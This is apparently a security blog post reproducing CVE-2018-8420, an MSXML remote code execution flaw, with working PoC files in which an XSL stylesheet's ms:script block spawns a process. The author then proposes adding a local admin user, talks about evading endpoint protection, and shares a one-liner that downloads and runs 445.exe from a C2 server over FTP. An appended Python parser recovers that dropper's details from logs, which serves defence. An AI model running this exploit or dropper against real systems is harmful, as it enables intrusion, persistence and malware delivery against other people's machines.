First of all, a special thanks to 倾旋 for providing the PoC code!!!
The affected versions first (the fix shipped in the September 2018 security updates):
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 Version 1803 for 32-bit Systems
- Microsoft Windows 10 Version 1803 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 10 version 1703 for 32-bit Systems
- Microsoft Windows 10 version 1703 for x64-based Systems
- Microsoft Windows 10 version 1709 for 32-bit Systems
- Microsoft Windows 10 version 1709 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for 64-bit Systems
- Microsoft Windows RT 8.1
- Microsoft Windows Server 1709
- Microsoft Windows Server 1803
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016
PoC:
PoC source: https://github.com/Lz1y/CVE-2018-8420
//xml.html
<!--from 倾旋-->
<script type="text/vbscript">
Sub POC()
    ' Instantiate the legacy MSXML DOM through its version-independent ProgID
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    ' The same document is used as both the source and the stylesheet
    Set xsl = XML
    xsl.Load "xml.xml"
    ' transformNode compiles the stylesheet, and with it the ms:script block inside xml.xml
    XML.transformNode xsl
End Sub
POC()
</script>
//xml.vbs
' Same trigger as xml.html, but run directly by wscript.exe/cscript.exe instead of Internet Explorer
Sub Dummy()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    ' The loaded document doubles as the stylesheet
    Set xsl = XML
    xsl.Load "xml.xml"
    ' Compiling the stylesheet runs the JScript in its ms:script block
    XML.transformNode xsl
End Sub
Dummy()
//xml.xml
<?xml version='1.0'?>
<!-- ms: binds the MSXML script-extension namespace; user: is the prefix the script block claims to implement -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<!-- No template ever calls a user: function; the top-level statement runs when the stylesheet is compiled -->
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Full JScript is available here, including ActiveXObject, so WScript.Shell can spawn a process
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
Those are the three files. Put them in the same directory and run either trigger from there: open xml.html in Internet Explorer (a text/vbscript block only executes in IE), or launch xml.vbs with wscript.exe or cscript.exe. Both load xml.xml as source document and stylesheet at once; transformNode compiles the stylesheet, the ms:script block is evaluated, and the JScript inside it pops calc.exe.
That is the reproduction as it stands.
Of course, stopping there would be a bit underwhelming, so I had an idea.
Look at the line in xml.xml that does the work:
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
calc.exe just pops the calculator. What if we ran something like net user admin admin /add instead? Keep in mind that adding a local user only succeeds if the process already has administrator rights; this is not privilege escalation, the script runs with whatever the victim's account can do.
Also, a bare net user command from a script host is usually caught by Windows Defender or other endpoint protection (not by the Windows firewall, which only filters network traffic). So let's keep following the idea: how do we avoid being blocked and get direct control of the target?
Hehe, time to share a piece of code from my private collection.
cmd /c @echo open 127.0.0.1>>Ex.dat&@echo 123>>Ex.dat&@echo 33444545>>Ex.dat&echo bin>>Ex.dat&@echo get 445.exe>>Ex.dat&@echo bye>>Ex.dat&@echo 445.exe>>Ex.dat&@ftp -s:Ex.dat&del Ex.dat&csrss.exe&445.exe
127.0.0.1 stands in for your own C2 server. The one-liner echoes an ftp script into Ex.dat (open the host, answer the User: and Password: prompts with 123 and 33444545, switch to binary, get 445.exe, bye), runs it with ftp -s:Ex.dat, deletes the script and then executes the downloaded 445.exe. Because it drives ftp.exe, the server side has to speak FTP with that account: the original suggests pairing it with HFS, but HFS is an HTTP file server, so either run an FTP server on the C2 host or swap the download for an HTTP fetch.
// No screenshots, to avoid getting invited for tea.
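When this one-liner shows up in a process-creation log it is worth pulling the ftp script back out of the echo chain instead of eyeballing it, because host, credentials, dropped file and post-download commands are all in there. The parser below is an added example (my code, not the original author's); it assumes the input is the cmd.exe command line as captured by process logging, handles both the auto-login form used on this page and the ftp -n / user form, and stops interpreting the script at bye the way ftp.exe does. The page's own one-liner is embedded as the sample.

```python
"""Reconstruct the FTP script hidden in an echo-chain download-and-execute one-liner."""
import re

# The page's one-liner, used here as the sample input (host and credentials are the author's placeholders).
SAMPLE = ("cmd /c @echo open 127.0.0.1>>Ex.dat&@echo 123>>Ex.dat&@echo 33444545>>Ex.dat"
          "&echo bin>>Ex.dat&@echo get 445.exe>>Ex.dat&@echo bye>>Ex.dat&@echo 445.exe>>Ex.dat"
          "&@ftp -s:Ex.dat&del Ex.dat&csrss.exe&445.exe")

ECHO_RE = re.compile(r'^echo\s+(.*?)\s*>>?\s*(\S+)$', re.IGNORECASE)   # echo <text> >> <file>
FTP_RE = re.compile(r'^ftp(?:\.exe)?\b.*?-s:(\S+)', re.IGNORECASE)      # ftp [-n] [-i] -s:<file>


def split_cmd_chain(cmdline):
    """Split a cmd.exe line on & / &&, drop a leading 'cmd /c|/k' and the @ echo-suppressor."""
    cmd = re.sub(r'^\s*cmd(?:\.exe)?\s+/[ck]\s+', '', cmdline.strip(), flags=re.IGNORECASE)
    parts = [p.strip() for p in re.split(r'\s*&&?\s*', cmd) if p.strip()]
    return [p.lstrip('@').strip() for p in parts]


def parse_ftp_dropper(cmdline):
    """Return where the dropper connects, as whom, what it fetches and what it runs afterwards.

    Returns None when the command line contains no 'ftp -s:<file>' invocation."""
    parts = split_cmd_chain(cmdline)
    written = {}            # redirect target (lower-cased) -> lines echoed into it, in order
    ftp_index = script_file = None
    for idx, part in enumerate(parts):
        m = ECHO_RE.match(part)
        if m:
            written.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        f = FTP_RE.match(part)
        if f and ftp_index is None:
            ftp_index, script_file = idx, f.group(1)
    if ftp_index is None:
        return None

    # 'ftp -n' suppresses auto-login; credentials then come from an explicit 'user' command instead.
    auto_login = re.search(r'(?:^|\s)-n(?:\s|$)', parts[ftp_index], re.IGNORECASE) is None
    lines = written.get(script_file.lower(), [])

    host = user = password = None
    downloads = []
    i = 0
    while i < len(lines):
        tok = lines[i].split()
        verb = tok[0].lower() if tok else ''
        if verb == 'open' and len(tok) > 1:
            host = tok[1]
            if auto_login:
                # ftp prompts User: then Password: after open; the next two script lines answer them
                user = lines[i + 1] if i + 1 < len(lines) else None
                password = lines[i + 2] if i + 2 < len(lines) else None
                i += 2
        elif verb == 'user':
            user = tok[1] if len(tok) > 1 else None
            password = tok[2] if len(tok) > 2 else None
        elif verb in ('get', 'recv', 'mget'):
            downloads.extend(tok[1:])
        elif verb in ('bye', 'quit'):
            break   # ftp.exe exits here; anything echoed after this line is never read
        i += 1

    after = parts[ftp_index + 1:]
    cleanup = [p for p in after if re.match(r'^(del|erase)\s', p, re.IGNORECASE)]
    executed = [p for p in after if p not in cleanup]
    return {
        'script_file': script_file,
        'script_lines': lines,
        'host': host,
        'user': user,
        'password': password,
        'downloads': downloads,
        'cleanup': cleanup,
        'executed': executed,
    }


if __name__ == '__main__':
    for key, value in parse_ftp_dropper(SAMPLE).items():
        print(f'{key}: {value}')
```

Run against the page's one-liner it reports host 127.0.0.1, user 123, password 33444545, a download of 445.exe, cleanup of Ex.dat and csrss.exe plus 445.exe executed afterwards. It also shows that the trailing echo of 445.exe into Ex.dat is dead weight: it lands after bye, so ftp.exe never reads it. The credentials are only a parsing convenience here; on the defending side the useful pivots are the host and the dropped filename.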
Author: ian
For reprints, please contact the editor through the public account backend.
Infringement will be pursued!!!
This article first appeared on the WeChat public account 零组攻防实验室: CVE-2018-8420 (reproducing the MSXML parser remote code execution vulnerability)